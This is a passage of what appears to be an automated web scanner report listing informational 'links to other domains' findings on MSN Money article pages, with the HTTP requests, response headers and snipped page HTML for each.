<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344893&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i>&#160;comes from&#160;Barbara Marquand&#160;at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
);" href="http://money.msn.com/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&amp;GT1=33004&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ef="http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&amp;GT1=33004&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Bill H</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xu-wZWlDmiUvCCrBuuOhmcI8fmnkZ4HfR?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X0Jb-asV9wuh8rlzoSI4St2M52NriGjQX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XtSNSqQgFZPsfB459aCi3rdya394_WRos?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&amp;form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&amp;form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&amp;form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&amp;form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&amp;form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&amp;form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.178. http://money.redacted/business-news/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business-news/article.aspx?feed=AP&date=20110129&id=12845569 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:54 GMT
Content-Length: 47625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353455&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Farticle.aspx%3Ffeed%3DAP%26date%3D20110129%26id%3D12845569&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li><a target="_top" href="http://www.bloomberg.com/news/2010-12-21/shell-qatar-to-sign-agreement-today-for-major-petrochemical-project.html?cmpid=msnmoney">Shell Set to Sign Agreement on `Major Petrochemicals Project' With Qatar</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://www.businessweek.com/bwdaily/headlinefeed.js"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.179. http://money.redacted/business-news/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business-news/article.aspx?feed=AP&date=20110129&id=12845569 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:56:45 GMT
Content-Length: 47625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410205&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Farticle.aspx%3Ffeed%3DAP%26date%3D20110129%26id%3D12845569&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li><a target="_top" href="http://www.bloomberg.com/news/2010-12-21/shell-qatar-to-sign-agreement-today-for-major-petrochemical-project.html?cmpid=msnmoney">Shell Set to Sign Agreement on `Major Petrochemicals Project' With Qatar</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://www.businessweek.com/bwdaily/headlinefeed.js"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.180. http://money.redacted/business-news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business-news/news.aspx?briefing=inplay HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:42 GMT
Content-Length: 51572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353443&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fbriefing%3Dinplay&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.181. http://money.redacted/business-news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business-news/news.aspx?symbol={0}&q={0} HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
